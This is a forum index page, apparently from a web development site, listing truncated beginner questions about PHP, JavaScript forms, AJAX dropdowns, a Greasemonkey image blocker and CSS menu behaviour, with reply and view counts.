Member Avatar for best4earn

Notice: Undefined index: uname in E:\xampp\htdocs\test.php on line 4 . This error accourd Data Base CREATE DATABASE IF NOT EXISTS `cms_project` DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci; USE `cms_project`; -- -------------------------------------------------------- -- -- Table structure for table `user_info` -- CREATE TABLE IF NOT EXISTS `user_info` ( `id` int(10) NOT NULL …

Member Avatar for iamthwee
0
185
Member Avatar for Dinh Nguyen

Can anybody tell me Why I click on button to submit form -> it works, but when I use javascript to auto submit -> it failed ? I have this form on aaa.com, it submit to bbb.com/result.jsp (another domain) <form id="myForm" name="myForm " method="post" action="www.bbb..com/result.jsp"> <input name="var01" value="var01 "> <input …

Member Avatar for iamthwee
0
6K
Member Avatar for andreiviziru

Hello! The main idea is that i want to set the variable for screen resolution of the user and pass it to php to manipulate her. How can i achieve that?

Member Avatar for broj1
0
317
Member Avatar for mikejordan111

I am trying to make the javascript read txt file which is working, and I want it to add each row in the txt file in a Column in the table and after 3 Columns start a new row in the table and so on. also while the javascript reading …

Member Avatar for stbuchok
0
770
Member Avatar for my3h

i want to fill up the text boxes with the data from the database vales. But at the same time it should display the values according to the static drop down value selected. I am not getting how to achieve this. Here is my code <form name="form1" action="submit.php" method="post"> <tr …

Member Avatar for iamthwee
0
734
Member Avatar for timetraveller1992

Here's my code >> [Click Here](https://dl.dropboxusercontent.com/u/21617707/accordion.rar) And here's an image showing the problem! >> [Click Here](http://i41.tinypic.com/4id7dc.png) Rest is self explainatory. I used the same code in IE and the problem didn't occur. I haven't tried Firefox. The problem is most people seem to use Chrome these days and thats why …

Member Avatar for timetraveller1992
0
245
Member Avatar for B0716L

Does anyone know how to make a checkbox on a web page that always stays checked no matter what computer sees it? It would always stay checked on that exact web page? If anyone knows how to do this, that would be great :)

Member Avatar for B0716L
0
279
Member Avatar for ghosh22

Hi Sorry I am posting again. I am trying to make a web form for my new website. I am doing the coding myself because I cannot afford to hire a coder for me. I need some help from you. Please forgive me for all my idiotic questions! Now, here's …

Member Avatar for almostbob
0
204
Member Avatar for mario90

hello i have this little image script that work on greasamonkey, the script is good and work like a charm it help me to block images i dont want to see but i wished it has interval timer becasue i run it over site with dynamic content ..the targeted pics …

Member Avatar for mario90
0
212
Member Avatar for wmhintz

Hello geniuses, I have inherited a ColdFusion application which uses four lines of AJAX in order to populate a drop-down based upon the selection made in a previous drop-down. The first drop-down is a list of car "makes", for example: Ford, Chevrolet, etc. The second drop-down is to be populated …

Member Avatar for paulkd
0
311
Member Avatar for dandeliondream

Hi, I am trying to create a menu like the one on http://www.momentumww.com/ When you scroll to section 'About', the menu 'About' button will be highlighted in white instead of black. Anyone has any idea how to do this?

Member Avatar for theHop
0
111

The End.